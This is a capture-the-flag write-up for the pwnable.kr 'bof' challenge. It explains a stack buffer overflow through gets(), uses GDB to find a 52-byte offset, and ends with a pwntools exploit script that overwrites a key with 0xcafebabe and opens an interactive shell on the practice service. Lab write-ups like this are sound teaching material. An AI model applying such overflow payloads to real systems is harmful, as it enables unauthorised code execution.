Bof

ssh bof@pwnable.kr -p2222 (pw: guest)

There are three files: readme, bof.c, and bof.

Based on the code, this is a stack overflow vulnerability. It is mainly caused by the gets() function, which does not check the length of the input data.

The task is not difficult; the main goal is to insert the value 0xcafebabe into the key parameter.

According to the readme, to view the files, you need to connect to nc 0 9000 and then enter the key value.

Debugging with GDB (challenging part)

The parameter we want to inspect is inside a function, so we need to set a breakpoint:

b func (Pause execution at the func() function)

gdb bof (Start debugging the bof program)

start, run (Begin debugging)

n (Move to the next line)

The arrow on the left indicates the current parameter being processed, and the right shows the function that is currently executing.

When we execute the gets() function and move to the next line, the program will prompt for input. After providing the input, you can use stack 30 to view the 30 lines of memory at that position.

We can see that the value we entered is 0xffffd4fc, while the target value is 0xffffd530. The difference between these two values is 52 bytes.

Therefore, when the gets() function is called, we should input b’A’ * 52 + p32(0xcafebabe).

However, since we need to connect to nc 0 9000, we will use the pwn library for this purpose.

from pwn import *
# Connect to the target
p = remote('0', 9000)

# Construct the payload
payload = b'A' * 52 + p32(0xcafebabe)

# Send the payload
p.sendline(payload)

# Enter interactive mode
p.interactive()